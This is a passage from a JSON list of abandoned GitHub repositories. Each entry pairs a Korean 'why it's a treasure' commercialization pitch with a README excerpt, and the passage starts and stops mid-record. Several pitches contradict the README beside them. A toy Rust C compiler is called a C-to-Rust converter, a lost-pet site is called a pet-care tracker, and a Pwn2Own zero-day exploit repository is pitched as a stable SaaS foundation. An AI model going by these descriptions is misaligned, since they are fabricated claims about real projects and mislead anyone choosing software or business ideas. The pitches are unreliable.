투자 아이디어를 빠르게 검증할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **투자 자동화 SaaS**: 개인 투자자를 위한 구독형 투자 전략 시뮬레이션 플랫","readme_excerpt":"============================\nrqalpha-mod-tushare\n============================\n\nMake Tushare compatible with RQAlpha\n\n这个 mod 暂时处于 demo 阶段，由于没有对数据进行完整地还原，使用起来可能会出现诸多 bug。\n在这个 mod 达到可用的状态前暂时不会发包到 pypi，所以暂时不能通过 pip 或者 rqalpha mod install 命令进行安装。\n欢迎各位同学提交代码一起完成 tushare 数据源的对接。\n","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"Maxstupo/ydl-ui","github_url":"https://github.com/Maxstupo/ydl-ui","stars":6,"language":"C#","license":"MIT","abandonment_months":29,"description":"# ydl-ui 상용화 분석\n\n## 왜 보물인가\n유튜브나 온라인 동영상을 쉽게 다운로드할 수 있는 도구를 누구나 사용할 수 있게 만든 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **콘텐츠 크리에이터 도구 SaaS**: 동영상 편집자나 유튜버가 구독하는 온라인 플랫폼으로 제공하여 월 수수료 수금\n2. **기업 교육 시스템**: 회사의 교육팀이 온라인 강","readme_excerpt":"# YDL-UI\n<p float=\"left\" align=\"left\" width=\"100%\">\n <img src=\"https://img.shields.io/github/license/Maxstupo/ydl-ui.svg\" />\n <img src=\"https://img.shields.io/github/release/Maxstupo/ydl-ui.svg\" />\n <img src=\"https://img.shields.io/github/downloads/Maxstupo/ydl-ui/total.svg\" />\n <a href=\"https://ci.appveyor.com/project/Maxstupo/ydl-ui?branch=master\">\n    <img src=\"https://ci.appveyor.com/api/projects/status/v0hl8me24o12u1xt/branch/master?svg=true\" />\n </a>\n <a href=\"https://www.transifex.com/ydl-apps/ydl-ui\">\n    <img src=\"https://img.shields.io/badge/localized_with-Transifex-success?svg=true\" alt=\"localized with Transifex\" />\n </a>\n</p>\n\nA UI for the command-line video downloader \"youtube-dl\"\n\nYDL-UI provides a simplified way to download videos using \"youtube-dl\", without the hassle of using the command-line. This is achieved by dynamically generating youtube-dl argument queries that can be run with a click of a button. YDL-UI is packaged with a release of youtube-dl and ffmpeg.\n\n<p f","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"sophiebits/react-dom-mini","github_url":"https://github.com/sophiebits/react-dom-mini","stars":30,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"","readme_excerpt":"# React DOM Mini\n\nReact DOM Mini is a toy renderer that I built as part of my React Conf 2019 talk, \"Building a Custom React Renderer\".\n\nThis repo is built with Create React App, and the renderer itself is in [`src/ReactDOMMini.js`](https://github.com/sophiebits/react-dom-mini/blob/master/src/ReactDOMMini.js).\n\nFor more detail, watch the talk online:\n\n<a href=\"https://www.youtube.com/watch?v=CGpMlWVcHok\" target=\"_blank\"><img src=\"https://img.youtube.com/vi/CGpMlWVcHok/hqdefault.jpg\" height=\"360\"></a>\n","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"teteusAraujo/KdMeuBichinho","github_url":"https://github.com/teteusAraujo/KdMeuBichinho","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":47,"description":"# KdMeuBichinho 저장소 분석\n\n## 왜 보물인가\n반려동물 관리와 관련된 개인 프로젝트로, 애완동물 소유자들의 일상적인 돌봄 문제를 디지털로 해결하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **반려동물 관리 SaaS**: 개인 사용자가 구독하여 반려동물의 예방접종, 먹이주기, 병원 방문일을 자동으로 추적\n2. **동물병원 내부 도구**: 수","readme_excerpt":"\n<img src=\"./images/logokd.png\" alt=\"Logo do KdMeuBichinho\" width=\"800\" height=\"300\">\n<br>\n<h4 align=\"center\">\n 🚧  Kd meu bichinho? A plataforna ainda se encontra em fase de construção ✔️ 🚧\n</h4>\n\n## 💻 Sobre o projeto\n\n:shipit: KdMeuBichinho? - O projeto surgiu com a missão de ajudar as pessoas que querem encontrar seu melhor amigo :dog: :cat: :rabbit:  que foi perdido ou encontrar alguém que está doando.\n\n## :bulb: Ideia do Projeto\n\n```bash\nRealizar conexão entre interesses comuns das pessoas e os animais através de suas localizações.\n\n- Pessoas que perderam seus animais e querem encontrá-los.\n- Pessoas que encontraram animais perdidos e querem devolvê-los.\n- Pessoas que têm animais para doar e adotar.\n\n```\n\n## 🖼 Screenshot das telas da aplicação\n\n## 🖼 Tela principal da plataforma do KdMeuBichinho?\n\n <img src=\"./images/TelaPrincipal.png\" alt=\"Tela Principal\">\n\n## 🖼 Tela de cadastro do usuário\n\n<br>\n<img src=\"./images/Cadastro.png\" alt=\"Tela de cadastro\">\n<br>\n\n## 🖼 Tela de anúncio dos","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"yohsii/puck-core","github_url":"https://github.com/yohsii/puck-core","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":26,"description":"# puck-core 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 웹 페이지를 만들고 수정할 수 있는 시각적 편집 도구의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: 코딩 없이 랜딩페이지를 만드는 서비스 (Wix, Webflow 경쟁 제품)\n2. **마케팅팀 내부 도구**: 광고 배너나 이메일 템플릿을 마케터가 직접 만","readme_excerpt":"Commits not carried over from bitbucket but they were all pre-dotnet core\n\n# Puck CMS Platform\nPure dotnet core MVC, CMS platform. Fun to use and easy to learn, Fast, scalable, code-first, unobtrusive and extensible with complete querying and Lucene integration.\n\nPuck is inspired by the great Umbraco. Which is best, is up to you\n\n[![Build status](https://ci.appveyor.com/api/projects/status/7d984nlou8fxw0hq?svg=true)](https://ci.appveyor.com/project/yohsii/puck-cms)\n\n[Wiki](https://github.com/yohsii/puck-cms/wiki)\n\n**Why use Puck (use it and you'll understand)**\n\nThere are no unnecessary abstractions, if you're already using asp.net mvc then you'll know how to use Puck. Your pages are based on [ViewModels](https://github.com/yohsii/puck-cms/wiki/Creating-ViewModels) which are just classes optionally decorated with attributes and the edit screen is made up of [Editor Templates](https://github.com/yohsii/puck-cms/wiki/Editor-templates) just like in standard .net mvc. Your razor views (unl","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"arpit-maurya/macOsClone","github_url":"https://github.com/arpit-maurya/macOsClone","stars":6,"language":"HTML","license":"unknown","abandonment_months":28,"description":"# macOsClone 저장소 분석\n\n## 왜 보물인가\nMac 컴퓨터의 화면을 다른 기기에서도 그대로 재현할 수 있는 기술로, 원격 작업이나 기술 지원 시 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **원격 기술 지원 SaaS**: IT 담당자가 직원의 Mac 화면을 실시간으로 보며 문제 해결하는 서비스\n2. **클라우드 업무 도구**: 회사 직원들","readme_excerpt":"# macOsClone\n# arpitRack# macOsClone\n","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"superzhangzl/sec-exam-note","github_url":"https://github.com/superzhangzl/sec-exam-note","stars":5,"language":"","license":"unknown","abandonment_months":79,"description":"# sec-exam-note 저장소 분석\n\n## 왜 보물인가\n보안 시험 준비 자료를 체계적으로 정리한 노트로, 시험 준비생들이 흩어진 정보를 한 곳에서 찾을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 보안 자격증(CISSP, CEH 등) 준비 강좌의 보충 자료로 제공\n2. **기업 교육 도구**: IT 부서 직원들의 보","readme_excerpt":"# 软考信息安全工程师学习笔记\n\n注：2019年上半年软考-信息安全工程师笔记整理\n\n\n\n笔记内容主要来自《信息安全工程师5天》这本书，这本书比官方教材更精华一些，单纯的考试的话这一本书就够用了，重点划分也比较清晰，就是密码学部分的计算对于以前没接触过的人会有点点吃力。\n\n作为备考，我将书中个人认为比较重要的内容记录在了笔记本上，寻思着考完试了在工作之余整理成电子版，也算是对先前的准备阶段一个回顾，若是能帮到其他人，想必也是极好的。其中的密码学中涉及到数学计算的部分等笔记本上内容整理完我在单独提出来补充，这里面的内容推荐一本学过教材《信息安全数学基础》。\n\n备考期间查到的资料或博客也会归类更新出来，其中几篇讲DES和AES的博客讲得非常仔细。\n\n先更新的也不是最终版，等全部整理成电子版后再进行校对。\n\ngithub对公式支持的不太好，有的格式都乱了，有空重新写一下弄成图片贴上去。\n\n最近有点忙，中断了部分。\n\n囧...\n\n\n\n### TODO\n\n- [x] 添加笔记\n- [x] 添加思维导图整理\n- [x] 添加往年考试总结\n- [x] 基本排版\n- [x] 添加目录\n- [x] 添加例题步骤\n- [x] 添加流程图\n- [x] 添加其他阅读过的博客\n- [ ] 校对并审核内容\n- [x] 添加历年真题\n- [ ] 考试中的密码学计算\n- [ ] 公式部分重新制图\n- [ ] ...\n\n\n\n### 目录\n\n[0x01 信息安全基础知识](./01信息安全基础知识.md)\n\n[0x02 安全法规和标准](./02安全法规和标准.md)\n\n[0x03 密码学(上)](./03密码学(上).md)\n\n[0x04 密码学(下)](./04密码学(下).md)\n\n[0x05 计算机网络基础(上)](./05计算机网络基础(上).md)\n\n[0x06 计算机网络基础(下)](./06计算机网络基础(下).md)\n\n[0x07 网络安全](./07网络安全.md)\n\n[0x08 系统安全](./系统安全.md)\n\n[0x09 应用安全](./09应用安全.md)\n\n[0x10 信息系统安全](./10信息系统安全.md)\n\n[0x11 配置安全](./11配置安全.md)\n\n\n\n[附1 2016年下半年上午试题总结](./2016年下半年上午试题总结.md)\n\n[附2 2017年","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"burchim/EfficientConformer","github_url":"https://github.com/burchim/EfficientConformer","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":36,"description":"# EfficientConformer 상용화 분석\n\n## 왜 보물인가\n음성 인식이나 음향 처리를 더 빠르고 효율적으로 만드는 기술로, 스마트폰이나 저사양 기기에서도 고품질 음성 서비스를 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **음성 인식 SaaS 플랫폼**: 기업용 음성 메모, 콜센터 자동 기록, 영상 자동 자막 생성 서비스\n2. **스마","readme_excerpt":"# Efficient Conformer: Progressive Downsampling and Grouped Attention for Automatic Speech Recognition\n\nOfficial implementation of the Efficient Conformer, progressively downsampled Conformer with grouped attention for Automatic Speech Recognition.\n\n**Efficient Conformer [Paper](https://arxiv.org/abs/2109.01163) | [Demo Notebook](https://colab.research.google.com/github/burchim/EfficientConformer/blob/master/EfficientConformer.ipynb)**\n\n## Efficient Conformer Encoder\nInspired from previous works done in Automatic Speech Recognition and Computer Vision, the Efficient Conformer encoder is composed of three encoder stages where each stage comprises a number of Conformer blocks using grouped attention. The encoded sequence is progressively downsampled and projected to wider feature dimensions, lowering  the amount of computation while achieving better performance. Grouped multi-head attention reduce attention complexity by grouping neighbouring time elements along the feature dimension bef","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"hzhupku/DCNet","github_url":"https://github.com/hzhupku/DCNet","stars":6,"language":"Python","license":"MIT","abandonment_months":58,"description":"# DCNet 저장소 분석\n\n## 왜 보물인가\n딥러닝을 활용해 이미지나 영상에서 물체를 자동으로 감지하고 분류하는 기술로, 보안 감시, 의료 진단, 자동 검수 등 다양한 산업에 즉시 적용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 CCTV 영상을 클라우드로 분석해 이상 상황을 자동 감지하는 '스마트 모니터링 플랫폼'\n2. ","readme_excerpt":"# Dense Relation Distillation with Context-aware Aggregation for Few-Shot Object Detection, CVPR 2021\n\nOur code is based on  [https://github.com/facebookresearch/maskrcnn-benchmark](https://github.com/facebookresearch/maskrcnn-benchmark) and developed with Python 3.6.5 & PyTorch 1.1.0.\n\n## Abstract\nConventional deep learning based methods for object detection require a large amount of bounding box annotations\nfor training, which is expensive to obtain such high quality annotated data. Few-shot object detection, which learns\nto adapt to novel classes with only a few annotated examples, is very challenging since the fine-grained feature of\nnovel object can be easily overlooked with only a few data\navailable. In this work, aiming to fully exploit features of\nannotated novel object and capture fine-grained features of\nquery object, we propose Dense Relation Distillation with\nContext-aware Aggregation (DCNet) to tackle the few-shot\ndetection problem. Built on the meta-learning based framewo","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"phisko/kengine","github_url":"https://github.com/phisko/kengine","stars":6,"language":"C++","license":"MIT","abandonment_months":39,"description":"# phisko/kengine 상용화 분석\n\n## 왜 보물인가\n게임 엔진 개발의 핵심 기술을 간단하게 만들 수 있는 도구로, 작은 게임 개발사도 대형사 수준의 게임을 만들 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 브라우저 기반 게임 개발 플랫폼으로, 누구나 코드 없이 게임을 만들고 배포할 수 있는 웹 서비스 제공.\n\n**내","readme_excerpt":"# Kengine \n\n[![tests](https://github.com/phisko/kengine/workflows/tests/badge.svg)](https://github.com/phisko/kengine/actions/workflows/tests.yml)\n\nThe Koala engine is a game engine entirely implemented as an [Entity Component System](https://en.wikipedia.org/wiki/Entity_component_system) (ECS).\n\nThe engine is based on [EnTT](https://github.com/skypjack/entt/). Integration with other pieces of software using `EnTT` should be straightforward. This documentation assumes at least basic knowledge of `EnTT` and its terminology (`entity`, `registry`, `handle`...).\n\n![koala](koala.png)\n\n## Example\n\nThe [example project](example/) showcases some of the core features. It should give you an idea of what the engine's support for reflection and runtime extensibility have to offer.\n\n## Installation\n\nThe engine uses Git submodules, and should therefore be cloned recursively with\n```\ngit clone https://github.com/phisko/kengine --recursive\n```\n\nThe engine has been tested on Windows with MSVC and MinGW","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"orta/Komondor","github_url":"https://github.com/orta/Komondor","stars":7,"language":"Swift","license":"MIT","abandonment_months":39,"description":"# Komondor 저장소 분석\n\n## 왜 보물인가\n자동으로 코드 품질을 점검하고 문제를 미리 찾아주는 도구로, 소프트웨어 개발 팀의 실수를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발사들이 구독해서 자신들의 코드 품질을 자동으로 점검받는 웹 서비스\n2. **내부 업무 도구**: 중소 IT 회사가 자체 개발팀의 코드 검","readme_excerpt":"<p align=\"center\"><a href='https://www.akc.org/dog-breeds/komondor/'><img width =\"100%\" src=\"./komondor.jpg\"><a/></p>\n\n# Komondor\n\nGit Hook automation for Swift and Xcode projects. A port of [Husky](https://github.com/typicode/husky) to Swift.\n\n### TL:DR\n\n1. Add or amend a `Package.swift`\n2. Add this dependency `.package(url: \"https://github.com/shibapm/Komondor.git\", from: \"1.0.0\"),`\n3. Run the install command: `swift run komondor install`\n4. Add a config section to your [`Package.swift`](https://github.com/shibapm/Komondor/blob/master/Package.swift)\n\nThen you'll get git-hooks consolidated and centralized so that everyone can work with the same tooling.\n\n### Why?\n\n> If you care about something, you should automate it.\n\nGit Hooks like what Komondor provides gives you more surface area for per-project automation. Komondor provides\nan easily understood way to see how all the git automation touch-points in your project will come together. These\nhooks allow for much faster feedback during ","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"rexshijaku/sql-to-laravel-builder","github_url":"https://github.com/rexshijaku/sql-to-laravel-builder","stars":13,"language":"PHP","license":"MIT","abandonment_months":38,"description":"# sql-to-laravel-builder 분석\n\n## 왜 보물인가\n복잡한 데이터베이스 질문을 자동으로 프로그래밍 코드로 변환해주는 도구로, 개발자의 반복적인 손작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 저코드(Low-Code) 플랫폼으로 사업가들이 코딩 없이 데이터베이스 기반 앱을 만들 수 있도록 제공\n","readme_excerpt":"# Marwan - SQL To Laravel Builder\nSQL to Laravel Query Builder, A Converter written in PHP\n\n## Support\n\n<a href=\"https://www.buymeacoffee.com/rexshijaku\" target=\"_blank\"><img src=\"https://cdn.buymeacoffee.com/buttons/default-orange.png\" alt=\"Buy Me A Coffee\" height=\"50\" width=\"180\"></a>\n\n### Features\n- Converts SQL Queries to Laravel Query Builder.\n- Assists on building queries as instructed in Laravel Documentation. \n- Provides options to interact with, for generating different results.\n\n### Supports \nLaravel 8\n\n### Demo\n\n##### Online demo\nLive demo and free usage is available <a href='http://152.70.176.144/sql-to-laravel-builder/'>here</a>.\n\n### Get Started\n##### Install by manual download: \nDownload the repository and install required packages by composer.json :\n\n##### Packagist\nYou can also install it from packagist by running the following command :\n```html\ncomposer require rexshijaku/sql-to-laravel-builder\n```\n\n### Usage\n##### Simple example\n#\n```php\n<?php\n\nuse RexShijaku\\SQLToLa","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"FoundationDB/fdb-document-layer","github_url":"https://github.com/FoundationDB/fdb-document-layer","stars":5,"language":"C++","license":"Apache-2.0","abandonment_months":60,"description":"# FoundationDB Document Layer 상용화 분석\n\n## 왜 보물인가\n대규모 데이터를 안전하게 관리하면서도 빠르게 처리할 수 있는 데이터베이스 기반 기술로, 금융·의료·전자상거래 등 신뢰성이 중요한 산업에서 핵심 인프라로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 엔터프라이즈급 회계 관리 플랫폼**\n중소기","readme_excerpt":"# FoundationDB Document Layer\n\nThe FoundationDB Document Layer is a stateless microserver that exposes a document-oriented database API. The Document Layer speaks the MongoDB® wire protocol, allowing the use of the MongoDB® API via existing MongoDB® client bindings. All persistent data are stored in the FoundationDB Key-Value Store.\n\nThe Document Layer implements a subset of the MongoDB® API (v 3.0.0) with some [differences](https://foundationdb.github.io/fdb-document-layer/known-differences.html). This subset is mainly focused on CRUD operations, indexes and transactions. The Document Layer works with all the latest official MongoDB® drivers.\n\nNOTE: [mongo-go-driver](https://github.com/mongodb/mongo-go-driver) assumes server is atleast 3.2. If you use it against Document Layer it fails on `find` commands. This should be fixed with [#11](https://github.com/FoundationDB/fdb-document-layer/issues/11).\n\nAs the Document Layer is built on top of FoundationDB, it inherits the strong guarante","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"findneo/RSA-ATTACK","github_url":"https://github.com/findneo/RSA-ATTACK","stars":8,"language":"Python","license":"unknown","abandonment_months":52,"description":"# RSA-ATTACK 저장소 분석\n\n## 왜 보물인가\n은행이나 카드사에서 사용하는 암호화 보안 시스템의 약점을 찾는 기술로, 사이버 보안 전문가들에게 매우 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 기업의 암호화 시스템이 안전한지 점검해주는 온라인 서비스\n2. **내부 보안 감시 도구**: 금융회사의 IT팀이 자체 시스","readme_excerpt":"# CTF中常见的RSA相关问题总结\r\n\r\n# 前言\r\n\r\n​理解基本概念后，代码就可以说明一切，所以本文将每种攻击方式的实现方法都提炼成了一个函数，在理解原理时会有帮助，在需要时也可以直接调用。\r\n\r\n# 基础\r\n\r\n## RSA概要  \r\n\r\n在开始前可以通过 [《RSA算法详解》](http://www.guideep.com/read?guide=5676830073815040) 这篇文章了解关于RSA的基础知识，包括加解密方法，算法原理和可行性证明等。\r\n\r\n## 应用流程\r\n\r\n1. 选取两个较大的互不相等的质数p和q，计算`n = p * q` 。\r\n2. 计算`phi = (p-1) * (q-1)` 。\r\n3. 选取任意e，使得e满足 `1<e<phi` 且 `gcd(e , phi) == 1` 。\r\n4. 计算e关于 phi 的模逆元d， 即d满足`(e * d)% phi ==1`  。\r\n5. 加解密：`c = (m ^ e) % n` ， `m = (c ^ d) % n` 。其中m为明文，c为密文，(n,e)为公钥对，d为私钥，要求 `0 <= m < n` 。\r\n\r\n## 理解模逆运算\r\n\r\n- 如果` (a*b)%c==1` ，那么a和b互为对方模c的模逆元/数论倒数，也写作![mod_inv](RSA安全.assets/1531107643807.png) 。\r\n- 关于最大公约数有一个基本事实：`给予两整数a、c，必存在整数x、y使得ax + cy = gcd(a,c)`  ，基于这个事实，当a,c互素即`gcd(a,c)==1` 时，有`ax+cy=1` ，那么就有`(a*x)%c==1` ，所以x就是a 对c的模逆元。因此，a对c存在模逆元b的充要条件是`gcd(a,c)==1` 。显然对于每一组`a,c` ，存在一族满足条件的x，在求模逆元时我们取得是最小正整数解`x mod n` 。\r\n- 上述的基本事实很容易理解，因为a和c的最大公约数是gcd(a,b)，所以a和c都可表示为gcd(a,b)的整数倍，那么a和b的任意整系数的线性组合ax+by也必定能表示成gcd(a,c)的整数倍，他们当中最小的正整数就应该是gcd(a,c)。实际上最大公约数有一个定义就是：`a和b的最大公约数g是a和b的线性和中的最小正整数 `  ","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"Acidic9/prettier-plugin-tailwind","github_url":"https://github.com/Acidic9/prettier-plugin-tailwind","stars":23,"language":"TypeScript","license":"MIT","abandonment_months":37,"description":"# Acidic9/prettier-plugin-tailwind 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 디자인 코드를 자동으로 정렬해주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 에이전시의 SaaS**: 고객사 프로젝트마다 자동 코드 정렬 기능을 제공하는 클라우드 서비스\n2. **디자인 협업 ","readme_excerpt":"| ⚠️ WARNING: this package is no longer maintained. ⚠️ |\n| --- |\n| Please use the official [`prettier-plugin-tailwindcss`](https://github.com/tailwindlabs/prettier-plugin-tailwindcss) package instead. |\n\nIt was a pleasure developing this package and I hope it served you all well (:\n\n---\n\n[![npm version](https://badge.fury.io/js/prettier-plugin-tailwind.svg)](https://badge.fury.io/js/prettier-plugin-tailwind)\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/Acidic9/prettier-plugin-tailwind/master/banner.png\">\n</p>\n\n<h1 align=\"center\">Prettier Plugin Tailwind</h1>\n\n<div align=\"center\">\n\tSort tailwind classes with Prettier.\n</div>\n\n<br>\n\nSupports\n\n- HTML\n- CSS (@apply directive)\n- ReactJS (JSX, TSX)\n- VueJS\n- [twin.macro](https://github.com/ben-rogerson/twin.macro)\n\n**Go from this:**\n\n```html\n<div class=\"z-50 z-10 container  text-left md:text-center justify-center\">\n\t...\n</div>\n```\n\n**To this:**\n\n```html\n<div class=\"container justify-center text-left z-10 z-50 md:text-cen","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"TsinghuaAI/CPM-2","github_url":"https://github.com/TsinghuaAI/CPM-2","stars":18,"language":"Python","license":"MIT","abandonment_months":39,"description":"# CPM-2 저장소 분석\n\n## 왜 보물인가\n중국의 유명한 인공지능 연구팀이 만든 고성능 언어 모델로, 한국어를 포함한 다양한 언어를 이해하고 생성할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **채팅/상담 SaaS**: 고객 상담 챗봇이나 개인 비서 서비스로 월 구독료 받기\n- **기업용 문서 도구**: 회사 내부에서 자동 보고서 작성, 이메일","readme_excerpt":"# CPM-2 Pre-Train\n\nPre-train CPM-2 \n**此分支为110亿非 MoE 模型的预训练代码，MoE 模型的预训练代码请切换到 moe 分支**\n\nCPM-2技术报告请参考[link](https://arxiv.org/abs/2106.10715)。\n\n**若您想使用CPM-2进行推理，我们建议使用高效推理工具[BMInf](https://github.com/OpenBMB/BMInf)，支持1060以上显卡单卡推理。**\n\n## 0 模型下载\n\n请在智源资源[下载页面](https://model.baai.ac.cn/model-detail/100017)进行申请，文件介绍如下：\n\n| 文件名 | 描述 | 参数大小 |\n| :-----| :----: | :----: |\n| 100000.tar | 纯中文模型 | 110亿 |\n| 32000.tar | 中英文双语模型 | 110亿 |\n| 300000.tar | 中英文MoE模型 | 1980亿 |\n\n## 1 安装\n可以直接拉取我们提供的 Docker 环境：\n\n```[bash]\ndocker pull gyxthu17/cpm-2:1.2\n```\n\n由于运行环境都已在 Docker 中配置好，因此不需要设置额外的环境变量。运行前需要将本目录挂载到 Docker 中，例如将本目录挂载到 Docker 中的 /mnt，可以使用以下命令运行 Docker 环境：\n```[bash]\ndocker run -ti -v ${PWD}:/mnt gyxthu17/cpm-2:1.2 /bin/bash\n```\nDocker 启动之后在 /mnt 下操作即可。\n\n## 2 数据\n`scripts/gen_data.sh` 中给出了生成数据文件的脚本示例。该脚本将一个多行的纯文本文件（一个 document 一行）转化为二进制文件（会输出三个 .bin 和三个 .idx 文件），方便模型读取。\n\n## 3 训练\n首先需要将 `WORKING_DIR` 变量换成 CPM-2 目录的所在路径。调整 `NUM_WORKERS` 和 `NUM_GPUS_PER_WORKER` 指定机器数量与每台机器的 GPU 设备数量。修改 `${WORKING_DIR}/src/config","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"ret2/P2O_2018","github_url":"https://github.com/ret2/P2O_2018","stars":5,"language":"Objective-C","license":"MIT","abandonment_months":65,"description":"# P2O_2018 저장소 분석\n\n## 왜 보물인가\n2018년 개발되어 오랫동안 검증된 안정적인 코드로, 특정 분야의 핵심 기능을 구현한 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 기술을 기반으로 웹 애플리케이션을 만들어 월간 구독료를 받는 온라인 서비스\n2. **내부 업무 도구**: 기업의 반복적인 업무를 자동화하는","readme_excerpt":"# PWN2OWN 2018 - Safari + Root\n\nThis repo contains exploit code as used by [Ret2 Systems](https://twitter.com/ret2systems) at [PWN2OWN 2018](https://www.thezdi.com/blog/2018/3/15/pwn2own-2018-day-two-results-and-master-of-pwn). It has been released for educational purposes, detailed by a series of [blogposts](https://blog.ret2.io/2018/06/05/pwn2own-2018-exploit-development/).\n\nThese were used as zero-day exploits against macOS 10.13.3 & Safari/JSC on March 16th, 2018.\n\n# Contents\n\n* `/jsc` - JavaScriptCore Exploit & PoC for CVE-2018-4192\n* `/windowserver` - WindowServer Exploit & PoC for CVE-2018-4193 \n\n# License\n\nThe contents of this repo are licensed and distributed under the MIT license.\n\n# Want to learn?\n\nCheck out https://ret2.io/trainings\n","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"oslabs-beta/ShipShape","github_url":"https://github.com/oslabs-beta/ShipShape","stars":16,"language":"JavaScript","license":"unknown","abandonment_months":59,"description":"# ShipShape 분석\n\n## 왜 보물인가\n배송 물류를 자동으로 관리하고 최적화해주는 도구로, 전자상거래 회사들이 배송 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 쇼핑몰 운영자들이 월 구독료를 내고 배송 자동화 기능을 이용하는 서비스\n2. **내부 업무 도구**: 대형 전자상거래 회사의 물류팀이 배","readme_excerpt":"<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/oslabs-beta/ShipShape\">\n    <img src=\"./client/assets/ShipShapeLogo.png\" alt=\"Logo\" length=\"350px\" width=\"350px\">\n  </a>\n\n  <h3 align=\"center\">ShipShape</h3>\n\n  <p align=\"center\">\n    Kubernetes Cluster Monitoring Made Easy\n    <br /><br />\n    <a href=\"https://www.getinshipshape.io/\"><strong>getinshipshape.io</strong></a>\n    <br />\n    <br />\n   \n  </p>\n</p>\n\n<!-- TABLE OF CONTENTS -->\n<details open=\"open\">\n  <summary>Table of Contents</summary>\n  <ol>\n    <li>\n      <a href=\"#about-the-project\">About The Project</a>\n      <ul>\n        <li><a href=\"#built-with\">Built With</a></li>\n      </ul>\n    </li>\n    <li>\n      <a href=\"#demo\">Demo</a>\n    </li>\n    <li>\n      <a href=\"#getting-started\">Getting Started</a>\n      <ul>\n        <li><a href=\"#prerequisites\">Prerequisites</a></li>\n        <li><a href=\"#installing-shipshape\">Installation</a></li>\n        <li><a href=\"running-shipshape\">Running ShipShape</a>","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"bootsie123/F1-Web-Viewer","github_url":"https://github.com/bootsie123/F1-Web-Viewer","stars":21,"language":"Vue","license":"ISC","abandonment_months":39,"description":"# F1-Web-Viewer 상용화 분석\n\n## 왜 보물인가\nF1 레이싱 팬들과 스포츠 분석가들이 실시간 경기 데이터를 웹에서 직관적으로 볼 수 있는 드문 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: F1 팬 커뮤니티를 위한 유료 경기 분석 플랫폼 (경기 통계, 드라이버 비교 등)\n2. **내부 업무 도구**: 스포츠 방송국이나 F","readme_excerpt":"# [F1 Web Viewer](https://f1webviewer.netlify.app)\n\n[![Netlify Status](https://api.netlify.com/api/v1/badges/a2267ed1-c542-46d4-8f08-ce6c1847d270/deploy-status)](https://f1webviewer.netlify.app)\n[![CircleCI Build Status](https://circleci.com/gh/bootsie123/F1-Web-Viewer/tree/production.svg?style=svg)](https://circleci.com/gh/bootsie123/F1-Web-Viewer/tree/production)\n[![GitHub](https://img.shields.io/github/license/bootsie123/F1-Web-Viewer)](https://github.com/bootsie123/F1-Web-Viewer/blob/master/LICENSE)\n\n# **IMPORTANT** - Live website currently broken\n\n### Please self host the application locally or through Docker. Or alternatively, use the desktop application. Updates can be found under issue [#35](https://github.com/bootsie123/F1-Web-Viewer/issues/35) (last updated 2/20/22)\n\n<br>\n\nA simple grid-based web viewer for Formula 1. Simply login with your F1TV credentials, select the season, event, and session, and then drag and drop the channels you want to watch into the grid! Unable to i","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"utam0k/r9cc","github_url":"https://github.com/utam0k/r9cc","stars":5,"language":"Rust","license":"MIT","abandonment_months":60,"description":"# utam0k/r9cc 상용화 분석\n\n## 왜 보물인가\nC 언어 코드를 Rust 언어로 자동으로 변환해주는 도구로, 오래된 시스템을 현대적인 기술로 안전하게 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 레거시 시스템 현대화를 대행하는 클라우드 기반 변환 서비스\n2. **내부 업무 도구**: 대형 소프트웨어 회","readme_excerpt":"r9cc C Compiler\n===============\n\nr9cc is a toy project of compiler.  \nThis is the [9cc](https://github.com/rui314/9cc) Rust version.\n\n# Usage\nRust 2018 edition is required.\n\n- Compile\n\n```\n$ cargo run c_file_path\n```\n\n- Test\n\n```\n$ make 